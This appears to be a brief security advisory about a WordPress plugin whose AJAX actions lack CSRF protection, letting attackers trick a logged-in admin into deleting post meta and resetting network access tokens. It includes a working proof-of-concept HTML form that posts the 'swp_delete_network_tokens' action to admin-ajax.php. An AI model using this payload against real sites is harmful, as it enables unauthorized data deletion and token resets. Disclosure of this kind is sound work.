The plugin does not have CSRF checks in some AJAX actions, allowing attackers, to make a logged in admin call them and delete arbitrary post meta as well as reset access tokens related to network via CSRF attacks
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="swp_delete_network_tokens">
<input type="text" name="network" value="42">
<input type="submit" name="submit" value="submit">
</form>